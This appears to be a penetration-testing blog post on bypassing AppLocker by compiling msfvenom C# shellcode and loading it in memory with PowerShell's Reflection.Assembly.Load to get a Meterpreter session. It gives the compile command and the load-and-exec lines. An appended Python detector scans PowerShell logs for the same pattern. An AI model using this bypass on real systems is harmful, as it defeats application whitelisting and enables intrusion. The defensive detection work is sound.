In an environment where AppLocker is enabled, it is still possible to run an executable because of the way assemblies are loaded in .NET applications. This bypass method was discovered by Casey Smith and presented at ShmooCon 2015. The Assembly Load method is able to load a file from three different locations:

  • Memory (Byte[])
  • Location on the disk
  • From a URL

The .NET assembly is initially loaded with Read permissions in order to enumerate the methods and properties associated with the binary; the permissions are then changed to Execute, so AppLocker or any other whitelisting application cannot identify that something was executed on the system.

Bypassing AppLocker with this method consists of three steps:

  • Generate C# ShellCode
  • Compile the .NET application
  • Execute ShellCode from Memory with Assembly Load

Metasploit MSFvenom can be used to generate C# shellcode:

C# Shellcode Generation

The shellcode above can be injected into the C# file, which can then be compiled with the csc utility (part of the .NET Framework) in order to generate the executable.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /unsafe /platform:x86 /out:shellcode.exe shellcode.cs
Compiling C# Code to Executable

Running the executable directly or from PowerShell will fail, since this binary is not whitelisted by an AppLocker rule.

AppLocker Rule - Block Executables
AppLocker Rule - Block ShellCode Binary

However, it is possible to bypass this restriction by using the Assembly Load method from PowerShell to execute the shellcode, which is embedded in the file and defined as a method, directly from memory.

public class Shellcode
{
    public static void Exec()
    {
        // native function's compiled code
        byte[] shellcode = new byte[354] {

The following needs to be executed from PowerShell:

$bytes = [System.IO.File]::ReadAllBytes("C:\shellcode.exe")
[Reflection.Assembly]::Load($bytes)
[Shellcode]::Exec()
Assembly Load

The shellcode will be executed and a Meterpreter session will open.

Meterpreter - ShellCode
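As an added defensive example (not part of the original post), the following Python scans PowerShell script block text, such as the Message field of event 4104 in Microsoft-Windows-PowerShell/Operational once script block logging is enabled, for the byte-array Assembly.Load pattern shown above. The sample script blocks are constructed for the example.

```python
import re

# Constructed sample PowerShell script block text, in the shape of the Message
# field of event 4104 (Microsoft-Windows-PowerShell/Operational) once script
# block logging is enabled. These are made-up samples, not real log data.
SAMPLE_SCRIPT_BLOCKS = [
    # Benign: a module import and an ordinary .NET static call
    "Import-Module ActiveDirectory\n$x = [System.Math]::Max(1, 2)",
    # The in-memory load described on the page
    '$bytes = [System.IO.File]::ReadAllBytes("C:\\shellcode.exe")\n'
    "[Reflection.Assembly]::Load($bytes)\n[Shellcode]::Exec()",
    # Same technique with different casing and the full namespace
    "$b=[IO.File]::ReadAllBytes('C:\\Users\\Public\\a.bin');"
    "[System.Reflection.Assembly]::load($b)",
    # Loading by path: AppLocker still evaluates the file, so not flagged here
    "[Reflection.Assembly]::LoadFile('C:\\Tools\\lib.dll')",
]

# Assembly.Load(...) called on a variable rather than a string literal, i.e.
# the byte[] overload. LoadFile/LoadFrom take a path and are excluded.
REFLECTIVE_LOAD = re.compile(
    r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(\s*\$\w+", re.IGNORECASE)
# A file being read into a byte array within the same script block
READ_ALL_BYTES = re.compile(
    r"\[(?:System\.)?IO\.File\]::ReadAllBytes\s*\(", re.IGNORECASE)


def classify_block(text):
    """Return (severity, reason) for one script block, or None if clean."""
    if not REFLECTIVE_LOAD.search(text):
        return None
    if READ_ALL_BYTES.search(text):
        return ("high", "Assembly.Load of bytes read from disk (in-memory load)")
    return ("medium", "Assembly.Load from a variable")


def scan_script_blocks(blocks):
    """Return (index, severity, reason) for every block worth reviewing."""
    findings = []
    for i, text in enumerate(blocks):
        result = classify_block(text)
        if result:
            findings.append((i,) + result)
    return findings


if __name__ == "__main__":
    for idx, sev, reason in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {sev}: {reason}")
```

Matching is case-insensitive because PowerShell type and method names are; a path-based LoadFile is left alone since AppLocker already evaluates the file on disk in that case.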

Resources

https://github.com/subTee/ShmooCon-2015

2 Comments

  1. Thanks!
    In case of using the ConstrainedLanguage setting for PowerShell, do you know if this prevents this method?
    Thanks again!
